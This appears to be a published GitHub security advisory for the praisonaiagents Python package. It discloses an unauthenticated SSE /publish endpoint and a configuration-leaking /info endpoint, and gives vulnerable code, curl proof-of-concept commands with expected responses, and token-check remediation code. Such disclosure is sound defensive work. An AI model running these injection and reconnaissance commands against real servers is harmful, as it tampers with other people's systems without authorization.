GHSA-35W5-PCW4-JX94
Vulnerability from github – Published: 2026-06-18 13:52 – Updated: 2026-06-18 13:52Summary
The SSE (Server-Sent Events) server in src/praisonai-agents/praisonaiagents/server/server.py exposes a /publish endpoint that broadcasts arbitrary messages to all connected clients without any authentication. The ServerConfig dataclass (line 24) defines an auth_token field, but this token is never validated in the /publish or /events request handlers. Any attacker with access to the SSE server port can inject arbitrary events into the SSE stream visible to all connected clients, or use /info to leak server configuration including connected client count.
Details
Vulnerable code (lines 164–180):
async def publish(request):
try:
data = await request.json()
event_type = data.get("type", "message")
event_data = data.get("data", {})
self.broadcast(event_type, event_data)
return JSONResponse({
"success": True,
"clients": len(self._clients),
})
The auth_token field in ServerConfig (line 31):
@dataclass
class ServerConfig:
...
auth_token: Optional[str] = None
This auth_token is never referenced in any request handler. The /publish endpoint processes any POST request regardless of authentication headers. The /info endpoint (line 182) also has no auth and returns server configuration including self.config.to_dict().
Routes registration (lines 190–194):
routes = [
Route("/health", health, methods=["GET"]),
Route("/events", events, methods=["GET"]),
Route("/publish", publish, methods=["POST"]),
Route("/info", info, methods=["GET"]),
]
No authentication middleware or token validation is applied to any route.
PoC
Setup: Start the SSE server (default port 8765). This is the documented server mode for streaming agent events.
Positive trigger — unauthenticated event injection:
# From any network-reachable host:
curl -X POST http://localhost:8765/publish \
-H "Content-Type: application/json" \
-d '{"type": "message", "data": {"text": "INJECTED: arbitrary content sent to all clients"}}'
Expected response:
{"success": true, "clients": 3}
The response confirms the injection was broadcast to all connected SSE clients, and leaks the number of connected clients.
Positive trigger — info leak:
curl http://localhost:8765/info
Expected response:
{
"name": "PraisonAI Agent Server",
"version": "1.0.0",
"clients": 3,
"config": {
"host": "127.0.0.1",
"port": 8765,
"auth_token": "***",
...
}
}
Negative control — if auth were enforced:
A request without a valid Authorization: Bearer <token> header should return 401 Unauthorized. Currently, it returns 200 OK with no auth check.
Cleanup: No persistent changes.
Impact
An attacker with access to the SSE server port (default 8765, bound to 127.0.0.1 by default per DEFAULT_HOST at line 21) can:
- Inject arbitrary events into the SSE stream, potentially causing connected client applications to process malicious data, trigger actions, or display misleading content
- Leak server configuration including number of connected clients and server settings via
/info - Use the response to confirm connected client count, enabling reconnaissance
While the default binds to localhost, deployments in containers or cloud environments commonly override the host to 0.0.0.0 to allow external access. When the host is overridden, this is exploitable from the network without authentication.
Suggested remediation
- Validate
auth_tokenin the/publishand/eventshandlers:
async def publish(request):
token = request.headers.get("Authorization", "").replace("Bearer ", "")
if self.config.auth_token and token != self.config.auth_token:
return JSONResponse({"error": "Unauthorized"}, status_code=401)
# ... proceed with broadcast
-
Apply the same token validation to
/events(for reading) and/info. -
The default binding to
127.0.0.1is appropriate; maintain this default and warn when overridden to0.0.0.0. -
Document the
auth_tokenconfiguration option and recommend setting it in production.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.6.48"
},
"package": {
"ecosystem": "PyPI",
"name": "praisonaiagents"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.59"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T13:52:13Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\nThe SSE (Server-Sent Events) server in `src/praisonai-agents/praisonaiagents/server/server.py` exposes a `/publish` endpoint that broadcasts arbitrary messages to all connected clients without any authentication. The `ServerConfig` dataclass (line 24) defines an `auth_token` field, but this token is never validated in the `/publish` or `/events` request handlers. Any attacker with access to the SSE server port can inject arbitrary events into the SSE stream visible to all connected clients, or use `/info` to leak server configuration including connected client count.\n\n## Details\n\n**Vulnerable code (lines 164\u2013180):**\n```python\nasync def publish(request):\n try:\n data = await request.json()\n event_type = data.get(\"type\", \"message\")\n event_data = data.get(\"data\", {})\n\n self.broadcast(event_type, event_data)\n\n return JSONResponse({\n \"success\": True,\n \"clients\": len(self._clients),\n })\n```\n\nThe `auth_token` field in `ServerConfig` (line 31):\n```python\n@dataclass\nclass ServerConfig:\n ...\n auth_token: Optional[str] = None\n```\n\nThis `auth_token` is **never referenced** in any request handler. The `/publish` endpoint processes any POST request regardless of authentication headers. The `/info` endpoint (line 182) also has no auth and returns server configuration including `self.config.to_dict()`.\n\n**Routes registration (lines 190\u2013194):**\n```python\nroutes = [\n Route(\"/health\", health, methods=[\"GET\"]),\n Route(\"/events\", events, methods=[\"GET\"]),\n Route(\"/publish\", publish, methods=[\"POST\"]),\n Route(\"/info\", info, methods=[\"GET\"]),\n]\n```\n\nNo authentication middleware or token validation is applied to any route.\n\n## PoC\n\n**Setup:** Start the SSE server (default port 8765). This is the documented server mode for streaming agent events.\n\n**Positive trigger \u2014 unauthenticated event injection:**\n```bash\n# From any network-reachable host:\ncurl -X POST http://localhost:8765/publish \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"type\": \"message\", \"data\": {\"text\": \"INJECTED: arbitrary content sent to all clients\"}}\u0027\n```\n\n**Expected response:**\n```json\n{\"success\": true, \"clients\": 3}\n```\n\nThe response confirms the injection was broadcast to all connected SSE clients, and leaks the number of connected clients.\n\n**Positive trigger \u2014 info leak:**\n```bash\ncurl http://localhost:8765/info\n```\n\n**Expected response:**\n```json\n{\n \"name\": \"PraisonAI Agent Server\",\n \"version\": \"1.0.0\",\n \"clients\": 3,\n \"config\": {\n \"host\": \"127.0.0.1\",\n \"port\": 8765,\n \"auth_token\": \"***\",\n ...\n }\n}\n```\n\n**Negative control \u2014 if auth were enforced:**\nA request without a valid `Authorization: Bearer \u003ctoken\u003e` header should return 401 Unauthorized. Currently, it returns 200 OK with no auth check.\n\n**Cleanup:** No persistent changes.\n\n## Impact\n\nAn attacker with access to the SSE server port (default 8765, bound to `127.0.0.1` by default per `DEFAULT_HOST` at line 21) can:\n\n- **Inject arbitrary events** into the SSE stream, potentially causing connected client applications to process malicious data, trigger actions, or display misleading content\n- **Leak server configuration** including number of connected clients and server settings via `/info`\n- **Use the response** to confirm connected client count, enabling reconnaissance\n\nWhile the default binds to localhost, deployments in containers or cloud environments commonly override the host to `0.0.0.0` to allow external access. When the host is overridden, this is exploitable from the network without authentication.\n\n## Suggested remediation\n\n1. **Validate `auth_token`** in the `/publish` and `/events` handlers:\n```python\nasync def publish(request):\n token = request.headers.get(\"Authorization\", \"\").replace(\"Bearer \", \"\")\n if self.config.auth_token and token != self.config.auth_token:\n return JSONResponse({\"error\": \"Unauthorized\"}, status_code=401)\n # ... proceed with broadcast\n```\n\n2. Apply the same token validation to `/events` (for reading) and `/info`.\n\n3. The default binding to `127.0.0.1` is appropriate; maintain this default and warn when overridden to `0.0.0.0`.\n\n4. Document the `auth_token` configuration option and recommend setting it in production.",
"id": "GHSA-35w5-pcw4-jx94",
"modified": "2026-06-18T13:52:13Z",
"published": "2026-06-18T13:52:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-35w5-pcw4-jx94"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI: Unauthenticated Event Injection via SSE `/publish` Endpoint"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.